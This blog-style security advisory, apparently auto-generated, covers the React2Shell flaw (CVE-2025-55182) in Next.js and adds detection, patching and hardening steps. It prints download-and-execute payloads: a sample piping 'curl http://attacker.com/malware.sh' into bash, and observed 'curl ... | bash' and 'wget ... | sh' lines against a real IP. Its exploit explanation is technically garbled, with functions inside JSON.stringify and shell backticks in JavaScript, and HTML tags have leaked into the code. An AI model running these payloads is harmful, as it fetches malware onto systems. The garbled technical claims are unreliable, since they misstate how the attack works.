React2Shell: Your Nextjs App Is Actively Being Hacked Right Now (CVE-2025-55182)

Listen to this Post

Featured Image

Introduction:

A critical vulnerability in React Server Components, dubbed “React2Shell” (CVE-2025-55182), has escalated from proof-of-concept to widespread active exploitation. Threat actors are now deploying weaponized payloads against unpatched Next.js applications, enabling remote code execution (RCE) by exploiting improper handling of serialized props. This transition marks a significant threat to the vast ecosystem of React and Next.js applications.

Learning Objectives:

  • Understand the technical mechanism behind the React2Shell RCE vulnerability.
  • Identify Indicators of Compromise (IOCs) and malicious payloads used in active attacks.
  • Implement immediate mitigation steps and long-term hardening for your React/Next.js applications.

You Should Know:

1. The Core Vulnerability: Serialization to Shell Execution

The vulnerability resides in the React Server Components (RSC) payload serialization mechanism. When a server component passes props to a client component, these props are serialized. Exploitation occurs when an attacker injects malicious JavaScript objects that, when deserialized and evaluated on the server, escape the serialization boundary and execute arbitrary system commands.

Step-by-step guide explaining what this does and how to use it.
The Flaw: The `__proto__.toString` or `__proto__.valueOf` methods of a crafted object can be manipulated to return a string containing shell command substitution (backticks).
Exploit Payload: Attackers send a specially crafted RSC payload where the `toString` method executes a command.

// Example malicious object structure in an RSC payload
JSON.stringify({
"root": {
"node": {
"<strong>proto</strong>": {
"toString": () => { return <code>$(curl -s http://attacker.com/malware.sh | bash)</code>; }
}
}
}
});

Result: During server-side deserialization and rendering, React calls `toString()` on the object, executing the embedded shell command with the privileges of the Node.js server process.

2. Weaponized Payloads Observed In the Wild

Security labs have documented attackers moving beyond simple PoCs to payloads designed for persistence, reconnaissance, and lateral movement.

Step-by-step guide explaining what this does and how to use it.
Attackers are executing commands to download and run secondary scripts. Common patterns include:

 Payload 1: Direct download and execution
curl -s http://malicious-domain[.]top/tools/static/1502/x.sh | bash

Payload 2: Reconnaissance & Backdoor installation
/bin/bash -c "wget -q -O- http://45.95.147[.]231/ash.sh | sh"

These scripts often perform:

  1. System Recon: whoami, id, cat /etc/passwd, uname -a.
  2. Persistence: Installing SSH keys, cron jobs, or systemd services.
  3. Lateral Movement: Scanning internal networks or deploying cryptocurrency miners.

3. Detection: Hunting for IOCs and Suspicious Activity

Immediate detection is crucial. Focus on server logs (Next.js, NGINX, Apache) and system commands.

Step-by-step guide explaining what this does and how to use it.
Scan Logs for Known IOCs: Use `grep` to search for known malicious domains and IPs from the Datadog IOCs list.

 Linux/Mac: Search access logs
grep -r "45.95.147.231|malicious-domain[.]top" /var/log/nginx/
grep -r "<strong>proto</strong>.toString" /var/log/node/app.log

Windows PowerShell: Search in event logs or files
Select-String -Path "C:\logs.log" -Pattern "malicious-domain[.]top"

Monitor Child Processes: Use auditing tools to see if Node.js spawns unexpected shells.

 Linux auditd rule to monitor `bash` spawned by `node`
sudo auditctl -a always,exit -F arch=b64 -S execve -F path=/bin/bash -F parent=node

4. Immediate Mitigation: Patching and Runtime Protection

The primary fix is to update your Next.js and React dependencies.

Step-by-step guide explaining what this does and how to use it.

1. Patch Immediately: Upgrade to the patched versions.

 Using npm
npm update next react react-dom @types/react @types/react-dom
 Verify versions: Next.js >= 14.2.22, 15.0.6, 15.1.4, or 15.2.0+

Using yarn
yarn upgrade next react react-dom --latest

2. Runtime Sanitization (Temporary Workaround): If immediate patching is impossible, implement a middleware to sanitize RSC payloads.

// Example Next.js middleware (pages/_middleware.js or app/_middleware.js)
export function middleware(request) {
const url = request.nextUrl;
// Block requests containing obvious proto pollution attempts in headers/body
// This is a simplistic filter and NOT a replacement for patching.
if (request.body && request.body.includes('<strong>proto</strong>')) {
return new Response('Bad Request', { status: 400 });
}
}

5. Cloud & Container Hardening

Limit the blast radius by applying the principle of least privilege to your deployment environment.

Step-by-step guide explaining what this does and how to use it.

Run as Non-Root User in Containers:

FROM node:18-alpine
RUN addgroup -g 1001 -S nodejs && adduser -S nextjs -u 1001
USER nextjs
COPY --chown=nextjs:nodejs . .
CMD ["npm", "start"]

Apply Seccomp/AppArmor Profiles: Restrict system calls available to the Node.js process.
Network Policies (Kubernetes): Restrict egress from pods to prevent callbacks to attacker C2 servers.

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: deny-egress-nextjs
spec:
podSelector:
matchLabels:
app: nextjs-app
policyTypes:
- Egress
egress:
- to:  Allow only essential external dependencies (e.g., npm registries, your APIs)
- ipBlock:
cidr: 10.0.0.0/8

6. API Security and Input Validation Post-Mortem

Use this incident to reinforce general input validation and security testing.

Step-by-step guide explaining what this does and how to use it.
Implement Strict Content-Security Policies (CSP): Mitigate the impact of potential client-side fallout.
Harden Object Serialization: Audit code for uses of JSON.parse, eval, or `Function` constructors with user input. Use safe serializers like `flatted` or @typescript-safe/json.

Automated Security Testing:

 Integrate vulnerability scanning into CI/CD
npm audit --production
 Use SAST tools for Node.js

7. Incident Response Playbook Activation

If you suspect a compromise, follow a structured IR process.

Step-by-step guide explaining what this does and how to use it.
1. Isolate: Take the affected instance offline or block its network traffic.
2. Analyze: Capture memory, disk images, and logs. Look for new user accounts, rogue processes, and unusual network connections.

 Linux triage commands
ss -tulpn  List all connections
ps auxf  Process tree
find / -type f -name ".sh" -mtime -1  Find recent scripts

3. Eradicate: Remove backdoors, rotate all credentials (secrets, keys, passwords).
4. Recover: Restore from a clean, patched backup. Monitor closely for re-infection.

What Undercode Say:

  • The Supply Chain Attack Vector is Real: This exploit doesn’t target your code, but the framework you trust. It underscores the critical need for dependency monitoring and swift patch application across the entire software development lifecycle.
  • Exploit Weaponization is Faster Than Ever: The window between PoC publication and weaponized attacks is now measured in hours, not days. Defensive strategies must be automated and pre-configured; manual response is no longer viable.

This event is a stark reminder that modern JavaScript frameworks, while powerful, introduce complex server-side attack surfaces. The rapid exploitation cycle demonstrates that attackers have automated pipelines ready to capitalize on new vulnerabilities. Organizations relying on React/Next.js must now treat framework updates with the same urgency as critical infrastructure patches, integrating robust software composition analysis (SCA) and runtime application self-protection (RASP) into their default security posture.

Prediction:

CVE-2025-55182 will serve as a blueprint for future attacks against meta-frameworks. We will see a rise in vulnerability research targeting the serialization/deserialization boundaries in similar full-stack frameworks (like Nuxt, SvelteKit). Furthermore, attackers will increasingly automate the integration of new RCE PoCs into botnets for mass scanning and exploitation, targeting not just large enterprises but any publicly exposed dev/test/staging instances. This will force a shift-left in security, making interactive application security testing (IAST) and deeper integration of security controls within the framework core a priority for development teams.

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Christophetafanidereeper Some – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky